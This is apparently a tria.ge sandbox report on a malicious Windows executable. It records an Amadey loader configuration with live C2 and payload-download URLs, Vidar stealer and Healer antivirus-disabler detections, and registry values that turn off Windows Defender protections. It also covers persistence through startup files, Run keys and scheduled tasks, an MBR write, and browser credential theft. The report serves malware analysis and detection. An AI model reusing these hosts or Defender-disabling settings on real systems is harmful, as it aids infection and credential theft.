Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
123s -
platform
windows10-2004_x64 -
resource
win10v2004-20250207-en -
resource tags
arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system -
submitted
08/02/2025, 07:07
Static task
static1
Behavioral task
behavioral1
Sample
bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe
Resource
win10v2004-20250207-en
General
-
Target
bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe
-
Size
938KB
-
MD5
d77cd6108c4916eb0cc768426b0bf4ad
-
SHA1
54e3f788bd1d1a1087459170b0c0f24197565f72
-
SHA256
bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f
-
SHA512
22b81e6a3cbd5eae12e7e856b7c79432327978a53046d6099f4e3b957c6cbfe3264a1fcf073eb04beedcee6ff28b63ff60379429d32f1aaeafd1aee8ea63c5ea
-
SSDEEP
24576:aqDEvCTbMWu7rQYlBQcBiT6rprG8ayDFh:aTvC/MTQYxsWR7ayDX
Malware Config
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Signatures
-
Amadey family
-
Detect Vidar Stealer 5 IoCs
resource yara_rule behavioral2/memory/4624-307-0x0000000000400000-0x000000000085E000-memory.dmp family_vidar_v7 behavioral2/memory/4624-358-0x0000000000400000-0x000000000085E000-memory.dmp family_vidar_v7 behavioral2/memory/4624-462-0x0000000000400000-0x000000000085E000-memory.dmp family_vidar_v7 behavioral2/memory/4624-551-0x0000000000400000-0x000000000085E000-memory.dmp family_vidar_v7 behavioral2/memory/4624-592-0x0000000000400000-0x000000000085E000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/3620-588-0x0000000000E80000-0x0000000001130000-memory.dmp healer behavioral2/memory/3620-589-0x0000000000E80000-0x0000000001130000-memory.dmp healer behavioral2/memory/3620-616-0x0000000000E80000-0x0000000001130000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE -
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Fe36XBk.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempIJ2TQBMBEWVSNBQDZ6ZUVLNSEPHDNKY3.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Bjkm5hE.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7fOMOTQ.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE -
Blocklisted process makes network request 64 IoCs
flow pid Process 13 3088 powershell.exe 31 4836 powershell.exe 39 4836 powershell.exe 44 4836 powershell.exe 46 4836 powershell.exe 55 4836 powershell.exe 58 4836 powershell.exe 60 4836 powershell.exe 63 4836 powershell.exe 64 4836 powershell.exe 65 4836 powershell.exe 66 4836 powershell.exe 67 4836 powershell.exe 68 4836 powershell.exe 69 4836 powershell.exe 70 4836 powershell.exe 71 4836 powershell.exe 73 4836 powershell.exe 74 4836 powershell.exe 77 4836 powershell.exe 78 4836 powershell.exe 79 4836 powershell.exe 80 4836 powershell.exe 85 4836 powershell.exe 86 4836 powershell.exe 87 4836 powershell.exe 90 4836 powershell.exe 98 4836 powershell.exe 100 4836 powershell.exe 114 4836 powershell.exe 116 4836 powershell.exe 118 4836 powershell.exe 119 4836 powershell.exe 131 4836 powershell.exe 142 4836 powershell.exe 148 4836 powershell.exe 151 4836 powershell.exe 154 4836 powershell.exe 157 4836 powershell.exe 159 4836 powershell.exe 160 4836 powershell.exe 162 4836 powershell.exe 164 4836 powershell.exe 166 4836 powershell.exe 174 4836 powershell.exe 177 4836 powershell.exe 183 4836 powershell.exe 187 4836 powershell.exe 188 4308 powershell.exe 194 4308 powershell.exe 197 4836 powershell.exe 201 4836 powershell.exe 202 4836 powershell.exe 206 4836 powershell.exe 210 4836 powershell.exe 212 3916 powershell.exe 214 4836 powershell.exe 219 4836 powershell.exe 220 4836 powershell.exe 225 4836 powershell.exe 226 4836 powershell.exe 227 4836 powershell.exe 229 4836 powershell.exe 230 4836 powershell.exe -
pid Process 2852 powershell.exe 1464 powershell.exe 2196 powershell.exe 3244 powershell.exe 2060 powershell.exe 3916 powershell.exe 1912 powershell.exe 3088 powershell.exe 708 powershell.exe 3208 powershell.exe 5008 powershell.exe 4308 powershell.exe -
Downloads MZ/PE file 9 IoCs
flow pid Process 13 3088 powershell.exe 212 3916 powershell.exe 231 1912 powershell.exe 25 4040 skotes.exe 25 4040 skotes.exe 25 4040 skotes.exe 25 4040 skotes.exe 126 1192 Process not Found 191 4040 skotes.exe -
Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 668 chrome.exe 1436 chrome.exe 4196 chrome.exe 3840 chrome.exe 1940 msedge.exe 4032 msedge.exe 4996 msedge.exe 3352 msedge.exe 384 msedge.exe -
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Bjkm5hE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7fOMOTQ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7fOMOTQ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Fe36XBk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempIJ2TQBMBEWVSNBQDZ6ZUVLNSEPHDNKY3.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempIJ2TQBMBEWVSNBQDZ6ZUVLNSEPHDNKY3.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Bjkm5hE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Fe36XBk.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1639772215-809007892-4072230623-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1639772215-809007892-4072230623-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1639772215-809007892-4072230623-1000\Control Panel\International\Geo\Nation TempIJ2TQBMBEWVSNBQDZ6ZUVLNSEPHDNKY3.EXE Key value queried \REGISTRY\USER\S-1-5-21-1639772215-809007892-4072230623-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-1639772215-809007892-4072230623-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1639772215-809007892-4072230623-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1639772215-809007892-4072230623-1000\Control Panel\International\Geo\Nation mshta.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe -
Executes dropped EXE 11 IoCs
pid Process 1196 TempIJ2TQBMBEWVSNBQDZ6ZUVLNSEPHDNKY3.EXE 4040 skotes.exe 4624 Bjkm5hE.exe 1876 skotes.exe 2276 7fOMOTQ.exe 1768 dDFw6mJ.exe 4160 bb53b2706a.exe 1736 483d2fa8a0d53818306efeb32d3.exe 3620 TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE 2704 Fe36XBk.exe 3640 dda6de0d95.exe -
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1639772215-809007892-4072230623-1000\Software\Wine Fe36XBk.exe Key opened \REGISTRY\USER\S-1-5-21-1639772215-809007892-4072230623-1000\Software\Wine TempIJ2TQBMBEWVSNBQDZ6ZUVLNSEPHDNKY3.EXE Key opened \REGISTRY\USER\S-1-5-21-1639772215-809007892-4072230623-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1639772215-809007892-4072230623-1000\Software\Wine Bjkm5hE.exe Key opened \REGISTRY\USER\S-1-5-21-1639772215-809007892-4072230623-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1639772215-809007892-4072230623-1000\Software\Wine 7fOMOTQ.exe Key opened \REGISTRY\USER\S-1-5-21-1639772215-809007892-4072230623-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-1639772215-809007892-4072230623-1000\Software\Wine TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" dDFw6mJ.exe Set value (str) \REGISTRY\USER\S-1-5-21-1639772215-809007892-4072230623-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bb53b2706a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1072400101\\bb53b2706a.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1639772215-809007892-4072230623-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1072401021\\am_no.cmd" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 186 bitbucket.org 188 bitbucket.org -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 Fe36XBk.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x00120000000233fd-444.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 1196 TempIJ2TQBMBEWVSNBQDZ6ZUVLNSEPHDNKY3.EXE 4040 skotes.exe 4624 Bjkm5hE.exe 1876 skotes.exe 2276 7fOMOTQ.exe 1736 483d2fa8a0d53818306efeb32d3.exe 3620 TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE 2704 Fe36XBk.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job TempIJ2TQBMBEWVSNBQDZ6ZUVLNSEPHDNKY3.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 41 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempIJ2TQBMBEWVSNBQDZ6ZUVLNSEPHDNKY3.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fe36XBk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bb53b2706a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7fOMOTQ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dda6de0d95.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1708 MicrosoftEdgeUpdate.exe -
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Bjkm5hE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Bjkm5hE.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4936 timeout.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133835866806025857" chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1639772215-809007892-4072230623-1000_Classes\Local Settings cmd.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2776 schtasks.exe 2168 schtasks.exe 4160 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3088 powershell.exe 3088 powershell.exe 1196 TempIJ2TQBMBEWVSNBQDZ6ZUVLNSEPHDNKY3.EXE 1196 TempIJ2TQBMBEWVSNBQDZ6ZUVLNSEPHDNKY3.EXE 4040 skotes.exe 4040 skotes.exe 2196 powershell.exe 2196 powershell.exe 3244 powershell.exe 3244 powershell.exe 4836 powershell.exe 4836 powershell.exe 1464 powershell.exe 1464 powershell.exe 708 powershell.exe 708 powershell.exe 708 powershell.exe 3208 powershell.exe 3208 powershell.exe 3208 powershell.exe 4624 Bjkm5hE.exe 4624 Bjkm5hE.exe 4624 Bjkm5hE.exe 4624 Bjkm5hE.exe 4624 Bjkm5hE.exe 4624 Bjkm5hE.exe 668 chrome.exe 668 chrome.exe 668 chrome.exe 1876 skotes.exe 1876 skotes.exe 4624 Bjkm5hE.exe 4624 Bjkm5hE.exe 4624 Bjkm5hE.exe 4624 Bjkm5hE.exe 4900 msedge.exe 4900 msedge.exe 1876 msedge.exe 1876 msedge.exe 1876 msedge.exe 1876 msedge.exe 4996 msedge.exe 4996 msedge.exe 2276 7fOMOTQ.exe 2276 7fOMOTQ.exe 5008 powershell.exe 5008 powershell.exe 5008 powershell.exe 4308 powershell.exe 4308 powershell.exe 4624 Bjkm5hE.exe 4624 Bjkm5hE.exe 4308 powershell.exe 2276 7fOMOTQ.exe 2276 7fOMOTQ.exe 2276 7fOMOTQ.exe 2276 7fOMOTQ.exe 3916 powershell.exe 3916 powershell.exe 3916 powershell.exe 2060 powershell.exe 2060 powershell.exe 2060 powershell.exe 2852 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 668 chrome.exe 668 chrome.exe 668 chrome.exe 4996 msedge.exe 4996 msedge.exe 4996 msedge.exe 4996 msedge.exe -
Suspicious use of AdjustPrivilegeToken 29 IoCs
description pid Process Token: SeDebugPrivilege 3088 powershell.exe Token: SeDebugPrivilege 2196 powershell.exe Token: SeDebugPrivilege 3244 powershell.exe Token: SeDebugPrivilege 4836 powershell.exe Token: SeDebugPrivilege 1464 powershell.exe Token: SeDebugPrivilege 708 powershell.exe Token: SeDebugPrivilege 3208 powershell.exe Token: SeShutdownPrivilege 668 chrome.exe Token: SeCreatePagefilePrivilege 668 chrome.exe Token: SeShutdownPrivilege 668 chrome.exe Token: SeCreatePagefilePrivilege 668 chrome.exe Token: SeShutdownPrivilege 668 chrome.exe Token: SeCreatePagefilePrivilege 668 chrome.exe Token: SeShutdownPrivilege 668 chrome.exe Token: SeCreatePagefilePrivilege 668 chrome.exe Token: SeShutdownPrivilege 668 chrome.exe Token: SeCreatePagefilePrivilege 668 chrome.exe Token: SeShutdownPrivilege 668 chrome.exe Token: SeCreatePagefilePrivilege 668 chrome.exe Token: SeShutdownPrivilege 668 chrome.exe Token: SeCreatePagefilePrivilege 668 chrome.exe Token: SeDebugPrivilege 5008 powershell.exe Token: SeDebugPrivilege 4308 powershell.exe Token: SeDebugPrivilege 3916 powershell.exe Token: SeDebugPrivilege 2060 powershell.exe Token: SeDebugPrivilege 2852 powershell.exe Token: SeDebugPrivilege 1464 powershell.exe Token: SeDebugPrivilege 1912 powershell.exe Token: SeDebugPrivilege 3620 TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE -
Suspicious use of FindShellTrayWindow 57 IoCs
pid Process 2952 bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe 2952 bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe 2952 bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe 668 chrome.exe 668 chrome.exe 668 chrome.exe 668 chrome.exe 668 chrome.exe 668 chrome.exe 668 chrome.exe 668 chrome.exe 668 chrome.exe 668 chrome.exe 668 chrome.exe 668 chrome.exe 668 chrome.exe 668 chrome.exe 668 chrome.exe 668 chrome.exe 668 chrome.exe 668 chrome.exe 668 chrome.exe 668 chrome.exe 668 chrome.exe 668 chrome.exe 668 chrome.exe 668 chrome.exe 668 chrome.exe 668 chrome.exe 4996 msedge.exe 4996 msedge.exe 4996 msedge.exe 4996 msedge.exe 4996 msedge.exe 4996 msedge.exe 4996 msedge.exe 4996 msedge.exe 4996 msedge.exe 4996 msedge.exe 4996 msedge.exe 4996 msedge.exe 4996 msedge.exe 4996 msedge.exe 4996 msedge.exe 4996 msedge.exe 4996 msedge.exe 4996 msedge.exe 4996 msedge.exe 4996 msedge.exe 4996 msedge.exe 4996 msedge.exe 4996 msedge.exe 4996 msedge.exe 4996 msedge.exe 4160 bb53b2706a.exe 4160 bb53b2706a.exe 4160 bb53b2706a.exe -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 2952 bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe 2952 bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe 2952 bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe 4160 bb53b2706a.exe 4160 bb53b2706a.exe 4160 bb53b2706a.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2952 wrote to memory of 4540 2952 bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe 86 PID 2952 wrote to memory of 4540 2952 bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe 86 PID 2952 wrote to memory of 4540 2952 bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe 86 PID 2952 wrote to memory of 3536 2952 bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe 87 PID 2952 wrote to memory of 3536 2952 bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe 87 PID 2952 wrote to memory of 3536 2952 bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe 87 PID 4540 wrote to memory of 2776 4540 cmd.exe 89 PID 4540 wrote to memory of 2776 4540 cmd.exe 89 PID 4540 wrote to memory of 2776 4540 cmd.exe 89 PID 3536 wrote to memory of 3088 3536 mshta.exe 92 PID 3536 wrote to memory of 3088 3536 mshta.exe 92 PID 3536 wrote to memory of 3088 3536 mshta.exe 92 PID 3088 wrote to memory of 1196 3088 powershell.exe 97 PID 3088 wrote to memory of 1196 3088 powershell.exe 97 PID 3088 wrote to memory of 1196 3088 powershell.exe 97 PID 1196 wrote to memory of 4040 1196 